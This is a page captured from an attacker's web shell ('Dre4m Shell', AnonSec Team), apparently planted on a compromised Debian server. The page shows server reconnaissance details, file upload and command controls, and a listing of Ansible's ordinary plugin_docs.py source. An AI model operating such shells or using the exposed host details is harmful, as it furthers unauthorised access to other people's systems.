Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.15.12.133
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/ansible/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python3/dist-packages/ansible/utils/plugin_docs.py
# Copyright: (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

from collections.abc import MutableMapping, MutableSet, MutableSequence
from pathlib import Path

from ansible import constants as C
from ansible.release import __version__ as ansible_version
from ansible.errors import AnsibleError, AnsibleParserError, AnsiblePluginNotFound
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_native
from ansible.parsing.plugin_docs import read_docstring
from ansible.parsing.yaml.loader import AnsibleLoader
from ansible.utils.display import Display

display = Display()


def merge_fragment(target, source):

    for key, value in source.items():
        if key in target:
            # assumes both structures have same type
            if isinstance(target[key], MutableMapping):
                value.update(target[key])
            elif isinstance(target[key], MutableSet):
                value.add(target[key])
            elif isinstance(target[key], MutableSequence):
                value = sorted(frozenset(value + target[key]))
            else:
                raise Exception("Attempt to extend a documentation fragment, invalid type for %s" % key)
        target[key] = value


def _process_versions_and_dates(fragment, is_module, return_docs, callback):
    def process_deprecation(deprecation, top_level=False):
        collection_name = 'removed_from_collection' if top_level else 'collection_name'
        if not isinstance(deprecation, MutableMapping):
            return
        if (is_module or top_level) and 'removed_in' in deprecation:  # used in module deprecations
            callback(deprecation, 'removed_in', collection_name)
        if 'removed_at_date' in deprecation:
            callback(deprecation, 'removed_at_date', collection_name)
        if not (is_module or top_level) and 'version' in deprecation:  # used in plugin option deprecations
            callback(deprecation, 'version', collection_name)

    def process_option_specifiers(specifiers):
        for specifier in specifiers:
            if not isinstance(specifier, MutableMapping):
                continue
            if 'version_added' in specifier:
                callback(specifier, 'version_added', 'version_added_collection')
            if isinstance(specifier.get('deprecated'), MutableMapping):
                process_deprecation(specifier['deprecated'])

    def process_options(options):
        for option in options.values():
            if not isinstance(option, MutableMapping):
                continue
            if 'version_added' in option:
                callback(option, 'version_added', 'version_added_collection')
            if not is_module:
                if isinstance(option.get('env'), list):
                    process_option_specifiers(option['env'])
                if isinstance(option.get('ini'), list):
                    process_option_specifiers(option['ini'])
                if isinstance(option.get('vars'), list):
                    process_option_specifiers(option['vars'])
                if isinstance(option.get('deprecated'), MutableMapping):
                    process_deprecation(option['deprecated'])
            if isinstance(option.get('suboptions'), MutableMapping):
                process_options(option['suboptions'])

    def process_return_values(return_values):
        for return_value in return_values.values():
            if not isinstance(return_value, MutableMapping):
                continue
            if 'version_added' in return_value:
                callback(return_value, 'version_added', 'version_added_collection')
            if isinstance(return_value.get('contains'), MutableMapping):
                process_return_values(return_value['contains'])

    def process_attributes(attributes):
        for attribute in attributes.values():
            if not isinstance(attribute, MutableMapping):
                continue
            if 'version_added' in attribute:
                callback(attribute, 'version_added', 'version_added_collection')

    if not fragment:
        return

    if return_docs:
        process_return_values(fragment)
        return

    if 'version_added' in fragment:
        callback(fragment, 'version_added', 'version_added_collection')
    if isinstance(fragment.get('deprecated'), MutableMapping):
        process_deprecation(fragment['deprecated'], top_level=True)
    if isinstance(fragment.get('options'), MutableMapping):
        process_options(fragment['options'])
    if isinstance(fragment.get('attributes'), MutableMapping):
        process_attributes(fragment['attributes'])


def add_collection_to_versions_and_dates(fragment, collection_name, is_module, return_docs=False):
    def add(options, option, collection_name_field):
        if collection_name_field not in options:
            options[collection_name_field] = collection_name

    _process_versions_and_dates(fragment, is_module, return_docs, add)


def remove_current_collection_from_versions_and_dates(fragment, collection_name, is_module, return_docs=False):
    def remove(options, option, collection_name_field):
        if options.get(collection_name_field) == collection_name:
            del options[collection_name_field]

    _process_versions_and_dates(fragment, is_module, return_docs, remove)


def add_fragments(doc, filename, fragment_loader, is_module=False):

    fragments = doc.pop('extends_documentation_fragment', [])

    if isinstance(fragments, string_types):
        fragments = [fragments]

    unknown_fragments = []

    # doc_fragments are allowed to specify a fragment var other than DOCUMENTATION
    # with a . separator; this is complicated by collections-hosted doc_fragments that
    # use the same separator. Assume it's collection-hosted normally first, try to load
    # as-specified. If failure, assume the right-most component is a var, split it off,
    # and retry the load.
    for fragment_slug in fragments:
        fragment_name = fragment_slug
        fragment_var = 'DOCUMENTATION'

        fragment_class = fragment_loader.get(fragment_name)
        if fragment_class is None and '.' in fragment_slug:
            splitname = fragment_slug.rsplit('.', 1)
            fragment_name = splitname[0]
            fragment_var = splitname[1].upper()
            fragment_class = fragment_loader.get(fragment_name)

        if fragment_class is None:
            unknown_fragments.append(fragment_slug)
            continue

        fragment_yaml = getattr(fragment_class, fragment_var, None)
        if fragment_yaml is None:
            if fragment_var != 'DOCUMENTATION':
                # if it's asking for something specific that's missing, that's an error
                unknown_fragments.append(fragment_slug)
                continue
            else:
                fragment_yaml = '{}'  # TODO: this is still an error later since we require 'options' below...

        fragment = AnsibleLoader(fragment_yaml, file_name=filename).get_single_data()

        real_fragment_name = getattr(fragment_class, 'ansible_name')
        real_collection_name = '.'.join(real_fragment_name.split('.')[0:2]) if '.' in real_fragment_name else ''
        add_collection_to_versions_and_dates(fragment, real_collection_name, is_module=is_module)

        if 'notes' in fragment:
            notes = fragment.pop('notes')
            if notes:
                if 'notes' not in doc:
                    doc['notes'] = []
                doc['notes'].extend(notes)

        if 'seealso' in fragment:
            seealso = fragment.pop('seealso')
            if seealso:
                if 'seealso' not in doc:
                    doc['seealso'] = []
                doc['seealso'].extend(seealso)

        if 'options' not in fragment and 'attributes' not in fragment:
            raise Exception("missing options or attributes in fragment (%s), possibly misformatted?: %s" % (fragment_name, filename))

        # ensure options themselves are directly merged
        for doc_key in ['options', 'attributes']:
            if doc_key in fragment:
                if doc_key in doc:
                    try:
                        merge_fragment(doc[doc_key], fragment.pop(doc_key))
                    except Exception as e:
                        raise AnsibleError("%s %s (%s) of unknown type: %s" % (to_native(e), doc_key, fragment_name, filename))
                else:
                    doc[doc_key] = fragment.pop(doc_key)

        # merge rest of the sections
        try:
            merge_fragment(doc, fragment)
        except Exception as e:
            raise AnsibleError("%s (%s) of unknown type: %s" % (to_native(e), fragment_name, filename))

    if unknown_fragments:
        raise AnsibleError('unknown doc_fragment(s) in file {0}: {1}'.format(filename, to_native(', '.join(unknown_fragments))))


def get_docstring(filename, fragment_loader, verbose=False, ignore_errors=False, collection_name=None, is_module=None, plugin_type=None):
    """
    DOCUMENTATION can be extended using documentation fragments loaded by the PluginLoader from the doc_fragments plugins.
    """

    if is_module is None:
        if plugin_type is None:
            is_module = False
        else:
            is_module = (plugin_type == 'module')
    else:
        # TODO deprecate is_module argument, now that we have 'type'
        pass

    data = read_docstring(filename, verbose=verbose, ignore_errors=ignore_errors)

    if data.get('doc', False):
        # add collection name to versions and dates
        if collection_name is not None:
            add_collection_to_versions_and_dates(data['doc'], collection_name, is_module=is_module)

        # add fragments to documentation
        add_fragments(data['doc'], filename, fragment_loader=fragment_loader, is_module=is_module)

    if data.get('returndocs', False):
        # add collection name to versions and dates
        if collection_name is not None:
            add_collection_to_versions_and_dates(data['returndocs'], collection_name, is_module=is_module, return_docs=True)

    return data['doc'], data['plainexamples'], data['returndocs'], data['metadata']


def get_versioned_doclink(path):
    """
    returns a versioned documentation link for the current Ansible major.minor version; used to generate
    in-product warning/error links to the configured DOCSITE_ROOT_URL
    (eg, https://docs.ansible.com/ansible/2.8/somepath/doc.html)

    :param path: relative path to a document under docs/docsite/rst;
    :return: absolute URL to the specified doc for the current version of Ansible
    """
    path = to_native(path)
    try:
        base_url = C.config.get_config_value('DOCSITE_ROOT_URL')
        if not base_url.endswith('/'):
            base_url += '/'
        if path.startswith('/'):
            path = path[1:]
        split_ver = ansible_version.split('.')
        if len(split_ver) < 3:
            raise RuntimeError('invalid version ({0})'.format(ansible_version))

        doc_version = '{0}.{1}'.format(split_ver[0], split_ver[1])

        # check to see if it's a X.Y.0 non-rc prerelease or dev release, if so, assume devel (since the X.Y doctree
        # isn't published until beta-ish)
        if split_ver[2].startswith('0'):
            # exclude rc; we should have the X.Y doctree live by rc1
            if any((pre in split_ver[2]) for pre in ['a', 'b']) or len(split_ver) > 3 and 'dev' in split_ver[3]:
                doc_version = 'devel'

        return '{0}{1}/{2}'.format(base_url, doc_version, path)
    except Exception as ex:
        return '(unable to create versioned doc link for path {0}: {1})'.format(path, to_native(ex))


def _find_adjacent(path, plugin, extensions):

    adjacent = Path(path)

    plugin_base_name = plugin.split('.')[-1]
    if adjacent.stem != plugin_base_name:
        # this should only affect filters/tests
        adjacent = adjacent.with_name(plugin_base_name)

    paths = []
    for ext in extensions:
        candidate = adjacent.with_suffix(ext)
        if candidate == adjacent:
            # we're looking for an adjacent file, skip this since it's identical
            continue
        if candidate.exists():
            paths.append(to_native(candidate))

    return paths


def find_plugin_docfile(plugin, plugin_type, loader):
    '''  if the plugin lives in a non-python file (eg, win_X.ps1), require the corresponding 'sidecar' file for docs '''

    context = loader.find_plugin_with_context(plugin, ignore_deprecated=False, check_aliases=True)
    if (not context or not context.resolved) and plugin_type in ('filter', 'test'):
        # should only happen for filters/test
        plugin_obj, context = loader.get_with_context(plugin)

    if not context or not context.resolved:
        raise AnsiblePluginNotFound('%s was not found' % (plugin), plugin_load_context=context)

    docfile = Path(context.plugin_resolved_path)
    if docfile.suffix not in C.DOC_EXTENSIONS:
        # only look for adjacent if plugin file does not support documents
        filenames = _find_adjacent(docfile, plugin, C.DOC_EXTENSIONS)
        filename = filenames[0] if filenames else None
    else:
        filename = to_native(docfile)

    if filename is None:
        raise AnsibleError('%s cannot contain DOCUMENTATION nor does it have a companion documentation file' % (plugin))

    return filename, context.plugin_resolved_collection


def get_plugin_docs(plugin, plugin_type, loader, fragment_loader, verbose):

    docs = []

    # find plugin doc file, if it doesn't exist this will throw error, we let it through
    # can raise exception and short circuit when 'not found'
    filename, collection_name = find_plugin_docfile(plugin, plugin_type, loader)

    try:
        docs = get_docstring(filename, fragment_loader, verbose=verbose, collection_name=collection_name, plugin_type=plugin_type)
    except Exception as e:
        raise AnsibleParserError('%s did not contain a DOCUMENTATION attribute (%s)' % (plugin, filename), orig_exc=e)

    # no good? try adjacent
    if not docs[0]:
        for newfile in _find_adjacent(filename, plugin, C.DOC_EXTENSIONS):
            try:
                docs = get_docstring(newfile, fragment_loader, verbose=verbose, collection_name=collection_name, plugin_type=plugin_type)
                filename = newfile
                if docs[0] is not None:
                    break
            except Exception as e:
                raise AnsibleParserError('Adjacent file %s did not contain a DOCUMENTATION attribute (%s)' % (plugin, filename), orig_exc=e)

    # add extra data to docs[0] (aka 'DOCUMENTATION')
    if docs[0] is None:
        raise AnsibleParserError('No documentation available for %s (%s)' % (plugin, filename))
    else:
        docs[0]['filename'] = filename
        docs[0]['collection'] = collection_name

    return docs

Anon7 - 2022
AnonSec Team